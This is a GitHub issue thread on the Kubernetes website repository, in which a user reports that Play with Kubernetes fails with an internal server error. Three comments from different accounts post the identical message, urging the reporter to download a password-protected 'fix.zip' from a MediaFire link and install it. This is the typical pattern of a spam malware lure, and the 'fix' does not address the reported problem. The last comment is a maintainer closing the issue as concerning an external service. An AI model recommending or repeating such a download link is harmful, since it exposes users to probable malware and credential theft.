### ISSUE TITLE
Debugging DNS Resolution - Play with kubernetes do not work

### ISSUE THREAD

**Issue by groundswel** [kubernetes/website#47690]
Play with Kubernetes do not work. I get an internal server error when Add new Instance is clicked on.

![image](https://github.com/user-attachments/assets/9bc075f7-9e5d-4084-9d17-f7a066a519eb)

**Comment by toufiksalhi** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by CoZmoTheGod** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by dipesh-rawat** [comment]
Since https://play-with-kubernetes.com/ is an external service, we recommend reporting any issues directly on their platform _(or support channels)_. 

/close not-planned
